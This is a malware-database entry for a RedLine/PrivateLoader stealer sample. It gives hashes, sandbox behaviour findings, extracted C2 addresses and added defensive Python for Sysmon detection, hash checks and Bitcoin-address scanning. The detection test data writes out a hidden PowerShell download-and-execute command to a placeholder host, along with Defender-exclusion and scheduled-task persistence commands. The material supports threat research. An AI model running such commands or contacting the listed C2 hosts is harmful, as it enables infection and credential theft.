MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: RedLineStealer
Vendor detections: 14



SHA256 hash: 6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933
SHA3-384 hash: 7ec14308d93b42c6ffd29fd20a7b2cdc8cc10983ee16414a7df707521659e9b93b97dfdbef472e5a6e161d7d0da4f6bb
SHA1 hash: c49da1e376ae346d420e1486b7b865ee0d6e1485
MD5 hash: 91f6f48383c2d43120c14b74bf894575
humanhash: mobile-failed-quebec-bravo
File name: SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902
Signature: RedLineStealer
File size: 5'715'968 bytes
First seen: 2022-11-23 20:37:54 UTC
Last seen: 2023-01-21 00:08:04 UTC
File type: Executable exe
MIME type: application/x-dosexec
imphash: 31a14226d3e64a75d1fc504da54b963c (1 x RedLineStealer, 1 x Amadey, 1 x PrivateLoader)
ssdeep: 98304:26L7KoWaVpkMExmC2PaCIpkEmjmvFYBBVEbYU5XdU2PS/Y:x7fC2PhXpmdwcYiXa2PS/Y
Threatray: 265 similar samples on MalwareBazaar
TLSH: T163462281F789C9B2D04E00319C2B17735F3099584A5AF20B7BACAB6D6EF33C672155B6
TrID: 52.9% (.EXE) Win32 Executable (generic) (4505/5/1)
      23.5% (.EXE) Generic Win/DOS Executable (2002/3)
      23.5% (.EXE) DOS Executable Generic (2000/1)
dhash icon: cccca665858178c4 (3 x RedLineStealer, 1 x ArkeiStealer)
Reporter: SecuriteInfoCom
Tags: exe RedLineStealer

Intelligence


File Origin
# of uploads: 2
# of downloads: 442
Origin country: n/a

Vendor Threat Intelligence
Malware family: redline
ID: 1
File name: https://urloso.com/2hp0pb
Verdict: Malicious activity
Analysis date: 2022-11-05 03:14:45 UTC
Tags: opendir loader redline stealer

Note:
ANY.RUN is an interactive sandbox; its report reflects every action the analyst took during the session, not only what the uploaded sample did on its own.
Result
Verdict: Malware
Behaviour
Searching for analyzing tools
Searching for the window
Creating a file in the Windows subdirectories
Creating synchronization primitives
Modifying a system file
DNS request
Sending an HTTP GET request
Replacing files
Sending a custom TCP request
Launching a service
Launching a process
Reading critical registry keys
Creating a file
Sending a UDP request
Searching for synchronization primitives
Creating a process from a recently created file
Creating a process with a hidden window
Creating a window
Creating a file in the %temp% subdirectories
Creating a file in the Program Files subdirectories
Running batch commands
Blocking the Windows Defender launch
Enabling autorun with the standard Software\Microsoft\Windows\CurrentVersion\Run registry branch
Adding exclusions to Windows Defender
Sending an HTTP GET request to an infection source
Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: packed shell32.dll
Result
Verdict: MALICIOUS
Details:
Windows PE Executable: Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.

Malware family: PrivateLoader
Verdict: Malicious
Result
Threat name: CryptOne, Fabookie, PrivateLoader, Smoke
Detection: malicious
Classification: troj.spyw.evad
Score: 100 / 100
Signature
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Antivirus detection for dropped file
Antivirus detection for URL or domain
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates HTML files with .exe extension (expired dropper behavior)
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Found evasive API chain (may stop execution after checking mutex)
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Modifies Group Policy settings
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Obfuscated command line found
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Powershell Download and Execute IEX
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected CryptOne packer
Yara detected Fabookie
Yara detected Generic Downloader
Yara detected PrivateLoader
Yara detected SmokeLoader
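The two sandbox behaviour lists above (autorun via the Software\Microsoft\Windows\CurrentVersion\Run branch, Windows Defender exclusions and disabled real-time protection, schtasks.exe persistence, and the "Powershell Download and Execute IEX" Sigma hit) all map directly onto Sysmon process-creation (EventID 1) and registry-value-set (EventID 13) telemetry. The following Python is an added example, not code from MalwareBazaar or from any of the sandboxes quoted on this page: it runs simple regex rules over constructed Sysmon-style events. The events, image paths, SID and the example.invalid URL are invented for the demonstration, and the patterns are my own approximations of the behaviours above, not the published Sigma rules themselves.

```python
"""Added example: Sysmon-style detection of the persistence and Defender-evasion
behaviours listed for this sample. Events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """Minimal Sysmon-like record: EventID 1 (process create) or 13 (registry value set)."""
    event_id: int
    image: str = ""
    command_line: str = ""
    target_object: str = ""


# rule name -> (applicable Sysmon event IDs, field to inspect, pattern)
RULES = {
    "run_key_persistence": (
        {13}, "target_object",
        re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)),
    "defender_exclusion_registry": (
        {13}, "target_object",
        re.compile(r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\", re.I)),
    "defender_exclusion_cmdline": (
        {1}, "command_line",
        re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)),
    "defender_realtime_disabled": (
        {13}, "target_object",
        re.compile(r"\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring$", re.I)),
    "schtasks_create": (
        {1}, "command_line",
        re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)),
    # Approximation of the "Powershell Download and Execute IEX" idea: IEX plus a download primitive.
    "powershell_download_iex": (
        {1}, "command_line",
        re.compile(r"(\bIEX\b|Invoke-Expression).*(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b)"
                   r"|(DownloadString|Net\.WebClient).*(\bIEX\b|Invoke-Expression)", re.I)),
}


def evaluate(events):
    """Return {rule_name: [indices of matching events]}; rules with no hits are omitted."""
    hits = {}
    for idx, ev in enumerate(events):
        for name, (ids, field_name, pattern) in RULES.items():
            if ev.event_id in ids and pattern.search(getattr(ev, field_name)):
                hits.setdefault(name, []).append(idx)
    return hits


# Constructed events modelled on the behaviours reported above (file names borrowed from the graph,
# SID and URL invented). Index 6 is a benign control that should not match anything.
SAMPLE_EVENTS = [
    Event(13, r"C:\Users\user\AppData\Roaming\Pefowycape.exe",
          target_object=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Pefowycape"),
    Event(13, r"C:\Program Files\Windows Defender\MsMpEng.exe",
          target_object=r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\user\AppData\Local\Temp"),
    Event(1, r"C:\Windows\System32\cmd.exe",
          command_line=r'cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"'),
    Event(13, r"C:\Windows\System32\reg.exe",
          target_object=r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring"),
    Event(1, r"C:\Windows\System32\schtasks.exe",
          command_line=r'schtasks.exe /create /tn "Install" /tr "C:\Users\user\AppData\Local\Temp\Install.exe" /sc minute /mo 1 /f'),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          command_line="powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""),
    Event(1, r"C:\Windows\System32\notepad.exe", command_line=r"notepad.exe C:\Users\user\notes.txt"),
]

if __name__ == "__main__":
    for rule, idxs in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(f"{rule:28s} -> events {idxs}")
```

Each rule fires on exactly one of the six malicious events and none on the notepad control. In production the registry rules need Sysmon configured to log EventID 13 for the Run, Defender and Policies keys, and the Add-MpPreference rule should also be checked against PowerShell ScriptBlock logging (EventID 4104), since the exclusion can be added from a script that never shows the cmdlet on a process command line.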
Behaviour
Behavior Graph (ID 752823; sample SecuriteInfo.com.Trojan.Sig...; start date 23/11/2022; architecture WINDOWS; score 100)

Top-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 27 other signatures

Process tree, with network contacts, dropped files and signatures listed per process:

SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exe
  network: 87.240.137.164 (VKONTAKTE-SPB-AS, Russian Federation); 95.142.206.2 (VKONTAKTE-SPB-AS, Russian Federation); 19 other IPs or domains
  dropped: C:\Users\...\n_QGqpyq2g7V5YA0iPGHJFba.exe (PE32); C:\Users\...\kpD5CuCeDxs2BGQj0A2qfgxw.exe (PE32); C:\Users\...\k4OoabPg0KMXdh8hRYbKWneV.exe (PE32); 23 other malicious files
  signatures: Overwrites code with unconditional jumps - possibly setting hooks in foreign process; Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); 7 other signatures
  -> Kw1AE7yL2IYYgMbU7NL9aNk6.exe
       network: 172.67.206.152 (CLOUDFLARENET, United States)
       dropped: C:\Users\user\AppData\Local\...\svchost.exe (PE32+); 3 other malicious files
       signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign process
  -> n_QGqpyq2g7V5YA0iPGHJFba.exe
       dropped: C:\Users\...\n_QGqpyq2g7V5YA0iPGHJFba.tmp (PE32)
       -> n_QGqpyq2g7V5YA0iPGHJFba.tmp
            dropped: C:\Users\user\AppData\Local\Temp\...\idp.dll (PE32); C:\Users\user\AppData\Local\...\PowerOff.exe (PE32); C:\Users\user\AppData\Local\...\_shfoldr.dll (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
            -> PowerOff.exe
                 network: 37.230.138.123 (ROCKETTELECOM-AS, Russian Federation)
                 dropped: C:\Users\user\AppData\...\Pefowycape.exe (PE32, listed twice); C:\Program Files (x86)\...\Dybufyfulu.exe (PE32); C:\...\Dybufyfulu.exe.config (XML)
                 signatures: Multi AV Scanner detection for dropped file
  -> AiuGUJAWhFOK_hkn8fos31kG.exe
       -> cmd.exe
            signatures: Drops PE files with a suspicious file extension
            -> cmd.exe
                 dropped: C:\Users\user\AppData\...\Fingering.exe.pif (PE32)
            -> conhost.exe
       -> dllhost.exe
  -> 10 other processes
       network: 45.10.52.33 (MTW-AS, Russian Federation); 157.240.196.35 (FACEBOOK, United States); 3 other IPs or domains
       dropped: C:\Users\user\AppData\Local\Temp\lp0Fki.cpl (PE32); C:\Users\user\AppData\Local\...\is-UOMLD.tmp (PE32); 3 other malicious files
       signatures: Tries to harvest and steal browser information (history, passwords, etc); Sets debug register (to hijack the execution of another thread)
       -> Install.exe
            dropped: C:\Users\user\AppData\Local\...\Install.exe (PE32)
       -> cmd.exe
            -> powershell.exe
                 network: 195.123.211.56 (ITL-LV, Bulgaria)
            -> conhost.exe
       -> schtasks.exe
            -> conhost.exe
       -> 4 other processes
            network: 104.208.16.94 (MICROSOFT-CORP-MSN-AS-BLOCK, United States)
            -> conhost.exe
            -> rundll32.exe
            -> rundll32.exe
svchost.exe
  -> is-UOMLD.tmp
       dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Users\user\AppData\Local\...\_iscrypt.dll (PE32); 6 other files (5 malicious)
svchost.exe
  network: 40.127.240.158 (MICROSOFT-CORP-MSN-AS-BLOCK, United States)
8 other processes
  -> WerFault.exe
       -> Conhost.exe
  -> MpCmdRun.exe
       -> conhost.exe
Threat name: Win32.Infostealer.PrivateLoader
Status: Malicious
First seen: 2022-10-12 16:27:39 UTC
File Type: PE (Exe)
Extracted files: 53
AV detection: 23 of 26 (88.46%)
Threat level: 5/5
Result
Malware family: privateloader
Score: 10/10
Tags: family:privateloader evasion loader main spyware stealer trojan
Behaviour
Suspicious behavior: EnumeratesProcesses
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks whether UAC is enabled
Looks up external IP address via web service
Checks BIOS information in registry
Checks computer location settings
Reads user/profile data of web browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
PrivateLoader
Malware Config
C2 Extraction:
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
208.67.104.60
Unpacked files

SHA256 hash: 8d7201372a79ec3b26300d4e45e3b0a5173f1489f645fafedc9f8d237bc35e89
MD5 hash: e61b5f14d26357cf5a3b5d95a7cad911
SHA1 hash: e04d578f25caea0f9fb84d31d1d34e45524b7b45
Detections: PrivateLoader win_privateloader_w0 win_privateloader_a0

SHA256 hash: 6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933 (the submitted sample itself)
MD5 hash: 91f6f48383c2d43120c14b74bf894575
SHA1 hash: c49da1e376ae346d420e1486b7b865ee0d6e1485
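The hashes in the file-information block and the unpacked-files list, together with the three C2 entries above, are the artefacts a responder actually reuses, so two checks are worth having at hand: confirming that a downloaded file really is the sample this entry describes, and turning the C2 list into a defanged, typed form that can be pasted into a ticket or a blocklist. The following Python is an added example, not MalwareBazaar's own tooling: it computes the same four digests the entry lists (MD5, SHA1, SHA256, SHA3-384) in one pass and compares them with the values copied from this page, and it classifies each C2 line as url, ipv4 or domain. The bytes hashed in the test are constructed; ssdeep, TLSH and imphash are not computed here because they need libraries outside the standard library.

```python
"""Added example: verify a downloaded sample against the digests this entry lists and
normalise the extracted C2 list. Not MalwareBazaar tooling; test inputs are constructed."""
import hashlib
import ipaddress
from urllib.parse import urlsplit

# Digests copied from the file-information block of this entry.
LISTED_HASHES = {
    "md5": "91f6f48383c2d43120c14b74bf894575",
    "sha1": "c49da1e376ae346d420e1486b7b865ee0d6e1485",
    "sha256": "6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933",
    "sha3_384": "7ec14308d93b42c6ffd29fd20a7b2cdc8cc10983ee16414a7df707521659e9b93b97dfdbef472e5a6e161d7d0da4f6bb",
}

# C2 extraction list copied from the entry. These are live IOCs: do not resolve or fetch them casually.
C2_LIST = [
    "http://91.241.19.125/pub.php?pub=one",
    "http://sarfoods.com/index.php",
    "208.67.104.60",
]


def digests(data, chunk_size=1 << 20):
    """Compute the four digests MalwareBazaar lists, feeding every hasher from a single pass."""
    hashers = {
        "md5": hashlib.md5(),
        "sha1": hashlib.sha1(),
        "sha256": hashlib.sha256(),
        "sha3_384": hashlib.sha3_384(),
    }
    view = memoryview(data)
    for offset in range(0, len(view), chunk_size):
        chunk = view[offset:offset + chunk_size]
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def verify(data, listed=LISTED_HASHES):
    """Compare each listed digest (any case) with the computed one; returns {algo: bool}."""
    computed = digests(data)
    return {name: computed[name] == value.lower() for name, value in listed.items()}


def _is_ipv4(host):
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return False


def classify_ioc(raw):
    """Classify one C2 line as url / ipv4 / domain, extract the host and produce a defanged copy."""
    value = raw.strip()
    if "://" in value:
        host = urlsplit(value).hostname or ""
        kind = "url"
    else:
        host = value
        kind = "ipv4" if _is_ipv4(host) else "domain"
    # Defang only the host part and the scheme, so paths and query strings stay searchable.
    defanged = value.replace(host, host.replace(".", "[.]"), 1) if host else value
    if defanged.startswith("http"):
        defanged = "hxxp" + defanged[4:]
    return {"kind": kind, "value": value, "host": host, "host_is_ip": _is_ipv4(host), "defanged": defanged}


def normalise_c2(lines=C2_LIST):
    return [classify_ioc(line) for line in lines]


if __name__ == "__main__":
    for ioc in normalise_c2():
        print(f"{ioc['kind']:6s} {ioc['host']:20s} {ioc['defanged']}")
```

MalwareBazaar serves samples as a password-protected zip (password "infected"); run verify() over the extracted executable, not the archive, and expect all four keys to be True for this entry. Two caveats from the page itself: the imphash is shared with Amadey and PrivateLoader samples and the icon dhash with an ArkeiStealer sample, so neither is a safe pivot on its own, and the second unpacked-file entry is the submitted sample itself, so only the 8d7201... hash adds a new indicator.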
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: BitcoinAddress
Author: Didier Stevens (@DidierStevens)
Description: Contains a valid Bitcoin address

Rule name: HeavensGate
Author: kevoreilly
Description: Heaven's Gate: switch from 32-bit to 64-bit mode

Rule name: INDICATOR_EXE_Packed_MPress
Author: ditekSHen
Description: Detects executables built or packed with MPress PE compressor

Rule name: MALWARE_Win_DLInjector06
Author: ditekSHen
Description: Detects downloader / injector

Rule name: meth_get_eip
Author: Willi Ballenthin

Rule name: privateloader
Author: andretavare5
Description: PrivateLoader pay-per-install malware

Rule name: Privateloader_Main_Component
Description: Detects PrivateLoader Main Component

Rule name: win_privateloader

Rule name: win_privateloader_w0
Author: andretavare5
Reference: https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service
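The BitcoinAddress rule above is described as matching a "valid" address. What makes that stronger than a plain regex is the Base58Check checksum: a legacy address decodes to 25 bytes, the last four of which must equal the first four bytes of SHA256(SHA256(version || hash160)), so random Base58-looking strings in a binary (build IDs, obfuscated names) are rejected. The following Python is an added example that re-implements that check and scans a buffer for addresses; it is not Didier Stevens' rule and does not reproduce its YARA logic. The buffer is constructed: the valid address is the well-known genesis-block coinbase address, the second candidate is the same string with its last character changed so the checksum fails, and the third is a run of '1' characters that passes the regex but decodes to the wrong length.

```python
"""Added example: scan a buffer for Base58Check-valid legacy Bitcoin addresses.
This is an illustration of the check the BitcoinAddress YARA rule implies, not the rule itself."""
import hashlib
import re
from typing import List, Optional

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Legacy P2PKH/P2SH addresses start with 1 or 3 and are 26 to 35 characters long. The lookarounds
# stop a candidate from starting or ending inside a longer Base58 run.
CANDIDATE = re.compile(
    "(?<![" + B58_ALPHABET + "])[13][" + B58_ALPHABET + "]{25,34}(?![" + B58_ALPHABET + "])"
)


def b58decode(s: str) -> Optional[bytes]:
    """Decode Base58; each leading '1' becomes a leading zero byte. Returns None on a bad character."""
    num = 0
    for ch in s:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return None
        num = num * 58 + idx
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def is_valid_bitcoin_address(s: str) -> bool:
    """Base58Check: 1 version byte + 20-byte hash + 4-byte double-SHA256 checksum, mainnet versions only."""
    raw = b58decode(s)
    if raw is None or len(raw) != 25 or raw[0] not in (0x00, 0x05):
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def find_bitcoin_addresses(data: bytes) -> List[str]:
    """Return every Base58Check-valid legacy address found in a byte buffer, in order of appearance."""
    text = data.decode("latin-1")  # one byte per character, so nothing is dropped or merged
    return [m.group(0) for m in CANDIDATE.finditer(text) if is_valid_bitcoin_address(m.group(0))]


# Constructed buffer standing in for a section of an unpacked binary.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"wallet=1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\x00"   # genesis coinbase address, valid
    + b"bad=1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb\x00"      # last character changed, checksum fails
    + b"noise=11111111111111111111111111111111\x00"      # regex hit, but decodes to 32 zero bytes
)

if __name__ == "__main__":
    print(find_bitcoin_addresses(SAMPLE))
```

Only the first candidate survives. The same checksum idea carries over to hunting for clipper malware that swaps wallet strings: a regex finds candidates, the checksum tells you which ones the malware author could actually receive funds at.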

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download: RedLineStealer, Executable exe 6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933 (this sample)

Delivery method: Distributed via web download
